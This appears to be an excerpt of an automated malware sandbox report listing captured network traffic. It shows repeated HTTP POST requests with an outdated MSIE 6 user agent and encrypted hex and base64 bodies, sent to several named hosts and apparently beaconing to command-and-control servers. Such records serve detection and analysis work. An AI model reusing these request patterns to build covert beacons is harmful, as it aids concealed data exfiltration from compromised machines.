48 64 6a 39 77 5a 36 65 35 6b 64 77 4c 57 4b 32 62 68 76 32 2f 41 35 49 48 39 70 77 6b 63 48 4d 39 66 48 44 65 42 63 73 44 43 4b 58 4d 6d 37 2f 71 48 58 62 65 51 75 56 70 66 58 54 68 65 2b 50 69 7a 6e 6c 41 30 59 65 59 31 74 61 2f 30 36 62 34 33 72 4d 37 4b 47 37 74 55 48 30 38 77 35 7a 39 76 7a 5a 78 59 30 61 6a 73 47 79 76 5a 58 42 37 38 77 54 43 56 47 46 2f 30 63 37 73 58 69 4f 37 44 70 4f 71 36 32 6b 7a 47 30 31 64 59 78 44 67 52 2f 36 4a 6d 69 54 2f 4c 72 6d 74 65 67 6a 53 6f 4a 79 66 76 41 54 74 49 7a 4e 58 62 31 34 30 44 76 4d 42 36 55 4f 7a 50 6d 69 70 31 49 34 6b 35 47 76 33 53 69 71 39 62 46 65 6a 68 4b 6f 78 65 4c 33 66 58 54 57 6e 77 42 2b 77 7a 43 64 42 56 75 54 68 68 37 38 37 63 57 69 35 32 4c 7a 62 78 4b 71 75 77 77 37 68 4f 4c 36 6c 75 4e 52 34 67 39 69 62 68 44 44 57 43 2f 4c 78 5a 35 34 54 4f 53 63 62 77 54 6d 34 4c 59 44 6f 45 4e 62 38 51 55 74 70 59 70 71 76 37 39 45 6e 6a 6d 41 4d 32 43 6a 49 70 6e 68 46 68 73 39 6d 57 69 54 57 6d 38 4a 6a 43 66 75 6a 34 70 52 2b 72 44 44 37 75 41 37 64 72 54 46 69 4d 54 46 75 55 62 6f 49 4b 4c 50 6a 68 66 74 62 47 30 56 48 79 42 65 6f 79 55 45 38 4d 54 48 6e 62 45 56 49 49 50 53 6a 77 46 53 6a 54 31 52 57 72 77 50 63 31 4a 64 6f 43 41 33 34 6a 51 74 66 5a 75 31 43 49 36 32 58 6d 31 72 54 35 33 4d 43 66 35 4d 79 6c 78 45 3d Data Ascii: 5GFh9gb6/ZlgIxkrIQmJqildJHFm0BnEmv5Fc7gaq2qU/MLYfXi3h39r/OC1w1ODfiJNmHTfOvJTXQtRzkSe1UKhhiKsElp19/rWmurdkP5B7ws4Ls2VthRWNyMHdj9wZ6e5kdwLWK2bhv2/A5IH9pwkcHM9fHDeBcsDCKXMm7/qHXbeQuVpfXThe+PiznlA0YeY1ta/06b43rM7KG7tUH08w5z9vzZxY0ajsGyvZXB78wTCVGF/0c7sXiO7DpOq62kzG01dYxDgR/6JmiT/LrmtegjSoJyfvATtIzNXb140DvMB6UOzPmip1I4k5Gv3Siq9bFejhKoxeL3fXTWnwB+wzCdBVuThh787cWi52LzbxKquww7hOL6luNR4g9ibhDDWC/LxZ54TOScbwTm4LYDoENb8QUtpYpqv79EnjmAM2CjIpnhFhs9mWiTWm8JjCfuj4pR+rDD7uA7drTFiMTFuUboIKLPjhftbG0VHyBeoyUE8MTHnbEVIIPSjwFSjT1RWrwPc1JdoCA34jQtfZu1CI62Xm1rT53MCf5MylxE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 56 65 66 4a 37 7a 6e 44 2f 5a 6e 6d 61 2b 6d 4c 79 4a 4f 72 4f 74 4b 48 64 76 55 58 75 57 44 2b 66 66 48 4f 4a 62 63 52 38 37 71 6f 6f 33 71 42 75 6f 64 58 4a 64 4a 55 74 65 6b 68 35 4c 50 76 41 61 72 67 42 6c 38 39 58 62 32 2b 5a 2b 79 31 7a 63 30 52 70 70 58 6e 2b 4b 4f 39 79 46 63 43 75 58 59 59 56 37 43 56 56 6a 55 4e 45 4c 61 55 56 54 36 7a 2b 2b 45 56 32 6f 53 44 66 4b 51 38 6a 56 45 6a 45 44 78 53 35 66 69 33 56 6e 7a 31 69 54 58 41 31 56 6b 63 72 55 79 4c 6f 43 6e 74 51 6a 43 4d 4b 78 62 68 49 32 42 44 7a 36 72 57 67 4c 44 6e 2b 56 35 6e 56 44 52 52 57 67 42 69 31 30 58 57 43 4f 6a 66 69 59 45 36 72 43 45 2f 57 4a 6a 61 64 46 48 54 77 70 4e 65 2f 4c 57 52 4b 64 44 78 5a 30 79 5a 6d 38 56 71 44 33 37 62 6b 2f 54 33 37 46 6c 4a 69 34 31 6b 37 30 41 38 54 73 78 4d 7a 61 45 59 50 76 4b 4e 68 44 4a 6c 69 6a 53 72 50 45 32 73 52 51 4d 71 66 50 42 53 50 63 52 68 41 57 36 48 67 32 69 6b 50 68 39 70 4e 52 35 6c 63 72 6f 43 6b 56 4c 2f 4f 57 6b 4e 38 54 4d 44 55 58 48 55 50 52 33 36 57 4d 52 2f 57 74 75 73 61 4d 66 66 6b 58 32 44 4c 74 70 38 32 51 44 55 31 41 50 31 50 72 76 44 7a 64 49 63 44 35 4a 46 65 79 49 67 7a 6e 5a 39 74 61 6d 58 77 4f 75 64 48 43 45 44 6a 6d 55 6a 2f 39 66 4f 62 6a 61 2b 67 68 6a 44 49 39 4b 69 77 71 62 41 62 32 62 74 36 55 74 52 6a 2f 4b 6f 70 6d 74 55 36 6a 5a 69 5a 6f 75 6f 50 5a 4a 4f 42 69 36 71 54 6b 39 54 75 48 4b 7a 34 66 61 54 48 68 51 44 75 59 71 2b 4e 4b 4c 5a 69 65 39 46 62 53 61 6e 6f 53 56 59 6a 4c 79 46 74 57 45 65 69 38 78 31 35 4b 68 4d 42 79 37 6a 56 79 4f 31 4d 43 35 53 49 6f 39 78 5a 38 30 67 47 4e 55 64 70 66 33 35 4f 52 57 4b 36 4e 4f 36 62 6a 31 2b 6d 43 67 3d Data Ascii: VefJ7znD/Znma+mLyJOrOtKHdvUXuWD+ffHOJbcR87qoo3qBuodXJdJUtekh5LPvAargBl89Xb2+Z+y1zc0RppXn+KO9yFcCuXYYV7CVVjUNELaUVT6z++EV2oSDfKQ8jVEjEDxS5fi3Vnz1iTXA1VkcrUyLoCntQjCMKxbhI2BDz6rWgLDn+V5nVDRRWgBi10XWCOjfiYE6rCE/WJjadFHTwpNe/LWRKdDxZ0yZm8VqD37bk/T37FlJi41k70A8TsxMzaEYPvKNhDJlijSrPE2sRQMqfPBSPcRhAW6Hg2ikPh9pNR5lcroCkVL/OWkN8TMDUXHUPR36WMR/WtusaMffkX2DLtp82QDU1AP1PrvDzdIcD5JFeyIgznZ9tamXwOudHCEDjmUj/9fObja+ghjDI9KiwqbAb2bt6UtRj/KopmtU6jZiZouoPZJOBi6qTk9TuHKz4faTHhQDuYq+NKLZie9FbSanoSVYjLyFtWEei8x15KhMBy7jVyO1MC5SIo9xZ80gGNUdpf35ORWK6NO6bj1+mCg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 77 69 2b 70 49 6c 66 5a 31 5a 6b 7a 6f 6d 6f 45 52 71 5a 69 65 71 44 6c 6e 77 75 4e 74 4a 41 6f 65 30 70 56 6a 57 35 61 55 67 68 67 33 6f 2b 57 78 54 52 53 4c 36 72 56 4d 77 73 52 46 71 73 6d 7a 55 57 44 61 4f 71 30 79 74 67 79 4a 43 6d 51 64 78 68 44 72 4b 6e 71 4f 31 46 46 32 77 48 4f 45 48 4e 71 7a 66 51 6a 32 65 57 4a 75 6c 69 58 70 64 62 49 79 75 62 7a 70 53 58 31 55 4c 6e 69 38 35 77 61 49 41 61 54 6b 47 4b 2b 45 39 48 4b 78 78 72 52 76 68 6e 6b 4a 68 37 6f 37 6c 76 2b 52 61 52 45 6b 5a 55 70 70 4f 32 54 47 4f 4e 65 2b 59 4c 56 6c 2f 73 58 4a 64 56 4a 36 58 30 54 2f 48 56 5a 61 64 36 62 6b 45 72 72 43 63 69 77 56 75 58 49 30 56 69 7a 67 32 79 44 76 46 57 7a 59 78 51 37 36 57 71 64 63 33 45 54 72 73 4c 55 42 64 64 33 6d 73 31 59 7a 6d 4c 63 72 65 65 54 6c 72 2f 44 74 79 44 2f 54 4e 67 47 50 47 39 65 2f 31 48 33 4a 34 57 52 68 67 6f 78 62 4c 71 2f 51 36 79 4e 4e 55 74 78 7a 46 61 46 74 62 64 71 76 78 73 76 2b 55 4e 33 6f 2f 75 31 38 4c 53 5a 53 37 74 35 43 31 76 39 77 37 33 70 50 66 72 68 79 48 55 66 4f 54 53 31 31 32 78 69 47 6e 63 47 54 6a 68 76 42 70 43 70 74 66 53 41 2f 43 68 75 6a 32 31 63 4f 71 50 70 50 69 68 4e 6c 79 71 46 4c 4b 43 6d 41 56 34 4b 6f 6f 70 74 46 2f 6e 4f 76 49 4a 70 6f 57 62 31 2b 45 54 72 38 54 41 41 36 39 64 74 53 75 57 70 72 41 6f 77 74 6e 59 52 34 67 63 67 73 50 36 64 30 6f 48 2f 4e 41 41 59 6c 68 2f 50 70 59 53 51 7a 55 77 4f 74 4e 65 63 41 52 54 66 48 6a 70 65 59 71 45 34 52 62 5a 53 79 4d 38 32 2f 73 37 4a 68 73 66 63 75 45 54 6f 70 47 43 33 35 74 4c 5a 73 69 4a 4c 35 71 4c 78 35 32 69 2b 71 52 64 46 73 36 37 2f 73 2b 74 54 66 4f 5a 2b 52 2f 2b 53 42 34 34 72 51 76 77 68 65 76 59 45 69 72 53 55 6a 34 56 58 52 58 53 51 Data Ascii: wi+pIlfZ1ZkzomoERqZieqDlnwuNtJAoe0pVjW5aUghg3o+WxTRSL6rVMwsRFqsmzUWDaOq0ytgyJCmQdxhDrKnqO1FF2wHOEHNqzfQj2eWJuliXpdbIyubzpSX1ULni85waIAaTkGK+E9HKxxrRvhnkJh7o7lv+RaREkZUppO2TGONe+YLVl/sXJdVJ6X0T/HVZad6bkErrCciwVuXI0Vizg2yDvFWzYxQ76Wqdc3ETrsLUBdd3ms1YzmLcreeTlr/DtyD/TNgGPG9e/1H3J4WRhgoxbLq/Q6yNNUtxzFaFtbdqvxsv+UN3o/u18LSZS7t5C1v9w73pPfrhyHUfOTS112xiGncGTjhvBpCptfSA/Chuj21cOqPpPihNlyqFLKCmAV4KooptF/nOvIJpoWb1+ETr8TAA69dtSuWprAowtnYR4gcgsP6d0oH/NAAYlh/PpYSQzUwOtNecARTfHjpeYqE4RbZSyM82/s7JhsfcuETopGC35tLZsiJL5qLx52i+qRdFs67/s+tTfOZ+R/+SB44rQvwhevYEirSUj4VXRXSQ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 42 56 44 45 73 43 4e 6d 68 64 4c 43 50 30 4c 79 71 68 56 53 44 55 77 6f 76 61 35 4a 72 32 6d 63 42 32 59 38 79 59 67 6c 51 68 74 4a 55 45 69 42 74 2f 49 41 52 54 39 35 72 6a 34 38 4c 38 2b 65 61 45 6e 36 63 6b 4b 6a 31 77 47 68 35 2b 35 54 75 6f 4d 78 43 68 6a 70 59 62 38 77 48 71 56 30 41 44 4a 33 6d 48 66 4c 6e 48 48 7a 41 56 61 36 6b 6c 6f 2b 37 64 54 45 54 66 45 61 63 64 4d 49 5a 34 70 44 56 6d 37 68 32 37 4f 38 45 45 31 2f 50 65 75 6c 79 6b 6c 58 48 43 6f 39 39 55 68 4c 42 65 53 7a 76 46 6b 32 34 2b 78 59 39 51 4c 6e 78 4f 77 62 39 77 4d 69 54 62 77 45 49 2f 36 6a 4f 68 49 65 48 6c 42 70 4b 6a 72 61 57 46 35 71 30 34 30 47 6c 74 36 57 65 6e 4b 6b 42 70 44 51 61 6d 5a 44 52 66 4c 36 77 32 37 75 71 51 4d 71 66 54 43 52 4d 45 69 75 55 72 61 64 44 4f 44 72 4b 61 39 57 51 46 41 49 66 7a 2b 44 58 71 59 75 69 70 36 57 50 51 76 61 54 6c 75 72 68 41 2b 50 59 4b 68 55 50 73 6d 63 55 42 6f 6a 2f 35 49 32 43 65 45 37 76 6c 78 67 37 34 5a 64 34 33 65 52 44 49 51 79 38 4e 53 55 39 72 68 6c 31 4c 76 34 65 41 42 74 68 7a 64 34 54 70 48 31 51 4b 79 7a 52 57 6d 62 42 4f 44 4c 34 4a 4a 6a 4a 77 74 36 51 69 79 2b 61 47 47 44 34 45 38 54 4c 63 72 47 48 42 33 75 6d 45 34 32 66 4c 44 78 72 6e 4f 48 51 45 6a 37 4f 31 34 56 61 37 77 35 70 32 46 53 36 65 4e 55 6e 73 55 63 62 73 72 78 41 64 59 6e 79 44 78 6e 36 38 41 50 6b 6f 59 43 34 73 36 45 71 32 64 41 35 46 6e 64 51 65 62 43 66 4a 32 4d 36 79 36 59 5a 52 43 45 67 55 77 63 41 47 76 58 69 77 43 57 63 79 56 4f 78 46 6b 62 72 30 67 70 36 37 61 76 31 6f 44 6d 52 5a 6f 30 76 38 36 56 46 34 39 45 34 73 61 74 71 73 66 34 79 73 67 59 37 4e 33 56 58 72 31 62 39 67 6e 66 74 69 62 7a 61 50 79 7a 39 79 50 4f 36 34 33 65 65 58 62 67 4f 55 37 50 4b 51 45 3d Data Ascii: BVDEsCNmhdLCP0LyqhVSDUwova5Jr2mcB2Y8yYglQhtJUEiBt/IART95rj48L8+eaEn6ckKj1wGh5+5TuoMxChjpYb8wHqV0ADJ3mHfLnHHzAVa6klo+7dTETfEacdMIZ4pDVm7h27O8EE1/PeulyklXHCo99UhLBeSzvFk24+xY9QLnxOwb9wMiTbwEI/6jOhIeHlBpKjraWF5q040Glt6WenKkBpDQamZDRfL6w27uqQMqfTCRMEiuUradDODrKa9WQFAIfz+DXqYuip6WPQvaTlurhA+PYKhUPsmcUBoj/5I2CeE7vlxg74Zd43eRDIQy8NSU9rhl1Lv4eABthzd4TpH1QKyzRWmbBODL4JJjJwt6Qiy+aGGD4E8TLcrGHB3umE42fLDxrnOHQEj7O14Va7w5p2FS6eNUnsUcbsrxAdYnyDxn68APkoYC4s6Eq2dA5FndQebCfJ2M6y6YZRCEgUwcAGvXiwCWcyVOxFkbr0gp67av1oDmRZo0v86VF49E4satqsf4ysgY7N3VXr1b9gnftibzaPyz9yPO643eeXbgOU7PKQE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 42 56 44 45 73 43 4e 6d 68 64 4c 43 50 30 4c 79 71 68 56 53 44 55 77 6f 76 61 35 4a 72 32 6d 63 42 32 59 38 79 59 67 6c 51 68 74 4a 55 45 69 42 74 2f 49 41 52 54 39 35 72 6a 34 38 4c 38 2b 65 61 45 6e 36 63 6b 4b 6a 31 77 47 68 35 2b 35 54 75 6f 4d 78 43 68 6a 70 59 62 38 77 48 71 56 30 41 44 4a 33 6d 48 66 4c 6e 48 48 7a 41 56 61 36 6b 6c 6f 2b 37 64 54 45 54 66 45 61 63 64 4d 49 5a 34 70 44 56 6d 37 68 32 37 4f 38 45 45 31 2f 50 65 75 6c 79 6b 6c 58 48 43 6f 39 39 55 68 4c 42 65 53 7a 76 46 6b 32 34 2b 78 59 39 51 4c 6e 78 4f 77 62 39 77 4d 69 54 62 77 45 49 2f 36 6a 4f 68 49 65 48 6c 42 70 4b 6a 72 61 57 46 35 71 30 34 30 47 6c 74 36 57 65 6e 4b 6b 42 70 44 51 61 6d 5a 44 52 66 4c 36 77 32 37 75 71 51 4d 71 66 54 43 52 4d 45 69 75 55 72 61 64 44 4f 44 72 4b 61 39 57 51 46 41 49 66 7a 2b 44 58 71 59 75 69 70 36 57 50 51 76 61 54 6c 75 72 68 41 2b 50 59 4b 68 55 50 73 6d 63 55 42 6f 6a 2f 35 49 32 43 65 45 37 76 6c 78 67 37 34 5a 64 34 33 65 52 44 49 51 79 38 4e 53 55 39 72 68 6c 31 4c 76 34 65 41 42 74 68 7a 64 34 54 70 48 31 51 4b 79 7a 52 57 6d 62 42 4f 44 4c 34 4a 4a 6a 4a 77 74 36 51 69 79 2b 61 47 47 44 34 45 38 54 4c 63 72 47 48 42 33 75 6d 45 34 32 66 4c 44 78 72 6e 4f 48 51 45 6a 37 4f 31 34 56 61 37 77 35 70 32 46 53 36 65 4e 55 6e 73 55 63 62 73 72 78 41 64 59 6e 79 44 78 6e 36 38 41 50 6b 6f 59 43 34 73 36 45 71 32 64 41 35 46 6e 64 51 65 62 43 66 4a 32 4d 36 79 36 59 5a 52 43 45 67 55 77 63 41 47 76 58 69 77 43 57 63 79 56 4f 78 46 6b 62 72 30 67 70 36 37 61 76 31 6f 44 6d 52 5a 6f 30 76 38 36 56 46 34 39 45 34 73 61 74 71 73 66 34 79 73 67 59 37 4e 33 56 58 72 31 62 39 67 6e 66 74 69 62 7a 61 50 79 7a 39 79 50 4f 36 34 33 65 65 58 62 67 4f 55 37 50 4b 51 45 3d Data Ascii: BVDEsCNmhdLCP0LyqhVSDUwova5Jr2mcB2Y8yYglQhtJUEiBt/IART95rj48L8+eaEn6ckKj1wGh5+5TuoMxChjpYb8wHqV0ADJ3mHfLnHHzAVa6klo+7dTETfEacdMIZ4pDVm7h27O8EE1/PeulyklXHCo99UhLBeSzvFk24+xY9QLnxOwb9wMiTbwEI/6jOhIeHlBpKjraWF5q040Glt6WenKkBpDQamZDRfL6w27uqQMqfTCRMEiuUradDODrKa9WQFAIfz+DXqYuip6WPQvaTlurhA+PYKhUPsmcUBoj/5I2CeE7vlxg74Zd43eRDIQy8NSU9rhl1Lv4eABthzd4TpH1QKyzRWmbBODL4JJjJwt6Qiy+aGGD4E8TLcrGHB3umE42fLDxrnOHQEj7O14Va7w5p2FS6eNUnsUcbsrxAdYnyDxn68APkoYC4s6Eq2dA5FndQebCfJ2M6y6YZRCEgUwcAGvXiwCWcyVOxFkbr0gp67av1oDmRZo0v86VF49E4satqsf4ysgY7N3VXr1b9gnftibzaPyz9yPO643eeXbgOU7PKQE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 55 55 2b 4d 55 53 56 41 43 5a 72 53 47 54 31 73 7a 50 4d 53 41 70 37 50 6b 4b 56 7a 31 6a 31 72 4b 61 2b 56 34 66 68 61 53 6b 2b 32 63 45 58 66 79 52 41 63 79 6f 47 69 6c 6b 65 49 46 78 76 43 63 35 76 73 4f 76 4b 35 65 77 69 49 5a 47 47 44 43 5a 58 42 6f 76 55 61 31 49 74 74 4e 61 71 45 67 38 63 78 69 34 50 59 45 2f 79 69 34 4d 78 48 42 49 54 4d 32 7a 78 5a 76 38 32 64 50 69 55 48 47 51 6d 5a 62 7a 77 62 2f 61 4d 79 52 37 72 36 61 76 2b 68 69 5a 43 7a 36 75 4b 4e 49 4f 41 63 65 31 4f 41 62 68 6b 6a 4c 52 50 32 44 4d 7a 58 2f 69 59 4c 4e 6e 66 76 6e 63 57 32 36 36 49 5a 62 77 32 4f 5a 50 68 6f 78 54 73 35 7a 32 68 4d 6e 65 61 39 4a 4d 41 4e 58 47 75 6f 54 66 51 2b 43 34 4b 72 64 62 6f 44 42 46 58 70 4a 4e 41 72 75 42 68 34 70 42 48 66 62 55 34 47 2b 32 58 75 36 4a 31 55 38 57 7a 4d 66 51 54 4d 6f 75 37 76 7a 61 56 65 6b 31 4b 51 4b 65 2b 41 45 4e 67 71 52 46 6b 44 39 58 57 63 6d 54 33 49 32 7a 42 75 35 72 53 79 59 52 54 61 33 51 63 52 44 65 50 30 79 62 54 65 47 36 53 66 37 72 67 77 4e 78 39 62 4f 47 6a 69 34 6f 53 39 51 4f 47 32 76 46 78 4d 67 44 57 41 49 35 41 63 43 6e 68 66 4b 68 34 68 4e 59 6f 42 7a 6c 41 72 51 2f 42 32 54 32 64 4d 54 46 64 34 35 74 4b 48 5a 4c 67 4d 6f 48 61 4a 58 74 67 71 49 61 6d 73 71 6e 4b 70 62 44 34 62 4c 75 4b 4a 79 36 39 4b 30 61 55 4d 55 36 54 6d 6b 7a 2b 63 58 4e 37 57 73 6c 61 70 68 4d 59 2f 68 31 35 32 67 50 6e 77 31 65 6a 68 66 56 62 61 5a 77 4a 6d 67 43 75 4a 30 6c 33 38 66 77 64 59 79 55 45 74 6b 36 6c 34 72 4f 39 6f 6f 31 45 45 2b 38 72 34 69 66 6e 44 31 45 6a 43 36 49 6a 54 35 6e 6a 39 30 50 6f 66 5a 52 32 63 48 67 66 56 78 68 6d 37 44 63 48 78 34 78 51 65 62 34 6b 6e 62 6f 70 68 37 6c 68 54 33 38 54 78 78 34 73 4b 69 79 42 67 74 67 3d 3d Data Ascii: UU+MUSVACZrSGT1szPMSAp7PkKVz1j1rKa+V4fhaSk+2cEXfyRAcyoGilkeIFxvCc5vsOvK5ewiIZGGDCZXBovUa1IttNaqEg8cxi4PYE/yi4MxHBITM2zxZv82dPiUHGQmZbzwb/aMyR7r6av+hiZCz6uKNIOAce1OAbhkjLRP2DMzX/iYLNnfvncW266IZbw2OZPhoxTs5z2hMnea9JMANXGuoTfQ+C4KrdboDBFXpJNAruBh4pBHfbU4G+2Xu6J1U8WzMfQTMou7vzaVek1KQKe+AENgqRFkD9XWcmT3I2zBu5rSyYRTa3QcRDeP0ybTeG6Sf7rgwNx9bOGji4oS9QOG2vFxMgDWAI5AcCnhfKh4hNYoBzlArQ/B2T2dMTFd45tKHZLgMoHaJXtgqIamsqnKpbD4bLuKJy69K0aUMU6Tmkz+cXN7WslaphMY/h152gPnw1ejhfVbaZwJmgCuJ0l38fwdYyUEtk6l4rO9oo1EE+8r4ifnD1EjC6IjT5nj90PofZR2cHgfVxhm7DcHx4xQeb4knboph7lhT38Txx4sKiyBgtg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 56 65 66 4a 37 7a 6e 44 2f 5a 6e 6d 61 2b 6d 4c 79 4a 4f 72 4f 74 4b 48 64 76 55 58 75 57 44 2b 66 66 48 4f 4a 62 63 52 38 37 71 6f 6f 33 71 42 75 6f 64 58 4a 64 4a 55 74 65 6b 68 35 4c 50 76 41 61 72 67 42 6c 38 39 58 62 32 2b 5a 2b 79 31 7a 63 30 52 70 70 58 6e 2b 4b 4f 39 79 46 63 43 75 58 59 59 56 37 43 56 56 6a 55 4e 45 4c 61 55 56 54 36 7a 2b 2b 45 56 32 6f 53 44 66 4b 51 38 6a 56 45 6a 45 44 78 53 35 66 69 33 56 6e 7a 31 69 54 58 41 31 56 6b 63 72 55 79 4c 6f 43 6e 74 51 6a 43 4d 4b 78 62 68 49 32 42 44 7a 36 72 57 67 4c 44 6e 2b 56 35 6e 56 44 52 52 57 67 42 69 31 30 58 57 43 4f 6a 66 69 59 45 36 72 43 45 2f 57 4a 6a 61 64 46 48 54 77 70 4e 65 2f 4c 57 52 4b 64 44 78 5a 30 79 5a 6d 38 56 71 44 33 37 62 6b 2f 54 33 37 46 6c 4a 69 34 31 6b 37 30 41 38 54 73 78 4d 7a 61 45 59 50 76 4b 4e 68 44 4a 6c 69 6a 53 72 50 45 32 73 52 51 4d 71 66 50 42 53 50 63 52 68 41 57 36 48 67 32 69 6b 50 68 39 70 4e 52 35 6c 63 72 6f 43 6b 56 4c 2f 4f 57 6b 4e 38 54 4d 44 55 58 48 55 50 52 33 36 57 4d 52 2f 57 74 75 73 61 4d 66 66 6b 58 32 44 4c 74 70 38 32 51 44 55 31 41 50 31 50 72 76 44 7a 64 49 63 44 35 4a 46 65 79 49 67 7a 6e 5a 39 74 61 6d 58 77 4f 75 64 48 43 45 44 6a 6d 55 6a 2f 39 66 4f 62 6a 61 2b 67 68 6a 44 49 39 4b 69 77 71 62 41 62 32 62 74 36 55 74 52 6a 2f 4b 6f 70 6d 74 55 36 6a 5a 69 5a 6f 75 6f 50 5a 4a 4f 42 69 36 71 54 6b 39 54 75 48 4b 7a 34 66 61 54 48 68 51 44 75 59 71 2b 4e 4b 4c 5a 69 65 39 46 62 53 61 6e 6f 53 56 59 6a 4c 79 46 74 57 45 65 69 38 78 31 35 4b 68 4d 42 79 37 6a 56 79 4f 31 4d 43 35 53 49 6f 39 78 5a 38 30 67 47 4e 55 64 70 66 33 35 4f 52 57 4b 36 4e 4f 36 62 6a 31 2b 6d 43 67 3d Data Ascii: VefJ7znD/Znma+mLyJOrOtKHdvUXuWD+ffHOJbcR87qoo3qBuodXJdJUtekh5LPvAargBl89Xb2+Z+y1zc0RppXn+KO9yFcCuXYYV7CVVjUNELaUVT6z++EV2oSDfKQ8jVEjEDxS5fi3Vnz1iTXA1VkcrUyLoCntQjCMKxbhI2BDz6rWgLDn+V5nVDRRWgBi10XWCOjfiYE6rCE/WJjadFHTwpNe/LWRKdDxZ0yZm8VqD37bk/T37FlJi41k70A8TsxMzaEYPvKNhDJlijSrPE2sRQMqfPBSPcRhAW6Hg2ikPh9pNR5lcroCkVL/OWkN8TMDUXHUPR36WMR/WtusaMffkX2DLtp82QDU1AP1PrvDzdIcD5JFeyIgznZ9tamXwOudHCEDjmUj/9fObja+ghjDI9KiwqbAb2bt6UtRj/KopmtU6jZiZouoPZJOBi6qTk9TuHKz4faTHhQDuYq+NKLZie9FbSanoSVYjLyFtWEei8x15KhMBy7jVyO1MC5SIo9xZ80gGNUdpf35ORWK6NO6bj1+mCg=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 55 55 2b 4d 55 53 56 41 43 5a 72 53 47 54 31 73 7a 50 4d 53 41 70 37 50 6b 4b 56 7a 31 6a 31 72 4b 61 2b 56 34 66 68 61 53 6b 2b 32 63 45 58 66 79 52 41 63 79 6f 47 69 6c 6b 65 49 46 78 76 43 63 35 76 73 4f 76 4b 35 65 77 69 49 5a 47 47 44 43 5a 58 42 6f 76 55 61 31 49 74 74 4e 61 71 45 67 38 63 78 69 34 50 59 45 2f 79 69 34 4d 78 48 42 49 54 4d 32 7a 78 5a 76 38 32 64 50 69 55 48 47 51 6d 5a 62 7a 77 62 2f 61 4d 79 52 37 72 36 61 76 2b 68 69 5a 43 7a 36 75 4b 4e 49 4f 41 63 65 31 4f 41 62 68 6b 6a 4c 52 50 32 44 4d 7a 58 2f 69 59 4c 4e 6e 66 76 6e 63 57 32 36 36 49 5a 62 77 32 4f 5a 50 68 6f 78 54 73 35 7a 32 68 4d 6e 65 61 39 4a 4d 41 4e 58 47 75 6f 54 66 51 2b 43 34 4b 72 64 62 6f 44 42 46 58 70 4a 4e 41 72 75 42 68 34 70 42 48 66 62 55 34 47 2b 32 58 75 36 4a 31 55 38 57 7a 4d 66 51 54 4d 6f 75 37 76 7a 61 56 65 6b 31 4b 51 4b 65 2b 41 45 4e 67 71 52 46 6b 44 39 58 57 63 6d 54 33 49 32 7a 42 75 35 72 53 79 59 52 54 61 33 51 63 52 44 65 50 30 79 62 54 65 47 36 53 66 37 72 67 77 4e 78 39 62 4f 47 6a 69 34 6f 53 39 51 4f 47 32 76 46 78 4d 67 44 57 41 49 35 41 63 43 6e 68 66 4b 68 34 68 4e 59 6f 42 7a 6c 41 72 51 2f 42 32 54 32 64 4d 54 46 64 34 35 74 4b 48 5a 4c 67 4d 6f 48 61 4a 58 74 67 71 49 61 6d 73 71 6e 4b 70 62 44 34 62 4c 75 4b 4a 79 36 39 4b 30 61 55 4d 55 36 54 6d 6b 7a 2b 63 58 4e 37 57 73 6c 61 70 68 4d 59 2f 68 31 35 32 67 50 6e 77 31 65 6a 68 66 56 62 61 5a 77 4a 6d 67 43 75 4a 30 6c 33 38 66 77 64 59 79 55 45 74 6b 36 6c 34 72 4f 39 6f 6f 31 45 45 2b 38 72 34 69 66 6e 44 31 45 6a 43 36 49 6a 54 35 6e 6a 39 30 50 6f 66 5a 52 32 63 48 67 66 56 78 68 6d 37 44 63 48 78 34 78 51 65 62 34 6b 6e 62 6f 70 68 37 6c 68 54 33 38 54 78 78 34 73 4b 69 79 42 67 74 67 3d 3d Data Ascii: 